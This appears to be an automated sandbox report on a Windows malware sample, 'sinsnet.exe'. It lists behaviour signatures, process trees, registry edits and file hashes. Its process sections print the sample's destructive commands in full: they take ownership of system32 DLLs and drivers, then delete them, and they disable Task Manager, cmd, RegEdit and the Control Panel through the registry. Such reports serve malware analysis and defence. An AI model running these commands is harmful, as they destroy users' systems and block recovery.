Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-lxrnmawdrl
Target sinsnet.exe
SHA256 cbb96bd03450e53027296986e90377fd66f623ec826b515a257308f8c3eff2c7
Tags discovery evasion exploit
Score 8/10

Analysis Overview

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Possible privilege escalation attempt

Disables cmd.exe use via registry modification

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies file permissions

Checks computer location settings

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Analysis: static1

Detonation Overview

Reported

2024-08-06 09:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 09:55

Reported

2024-08-06 09:57

Platform

win7-20240704-en

Max time kernel

117s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
(24 identical entries)

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
(6 identical entries)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
(64 identical entries)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 1968 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2852 wrote to memory of 2880 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1968 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 1968 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2896 wrote to memory of 2780 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1968 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2896 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1968 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2852 wrote to memory of 2572 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1968 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 1968 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 1968 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\System32\mspaint.exe (24 instances)

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\notepad.exe (18 instances)

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit.exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064


Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 09:55

Reported

2024-08-06 09:57

Platform

win10v2004-20240802-en

Max time kernel

129s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
(24 identical entries)

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
(6 identical entries)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
(48 identical entries)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
(64 identical entries)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4100 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 4100 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2988 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 4100 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 840 wrote to memory of 3504 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2068 wrote to memory of 64 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4100 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2068 wrote to memory of 1512 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4100 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3280 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 772 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 4100 wrote to memory of 5072 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 840 wrote to memory of 2108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4100 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 4100 wrote to memory of 3184 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wininit.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4100-0-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

C:\Windows\Debug\WIA\wiatrace.log

memory/4100-4-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp

memory/4100-35-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp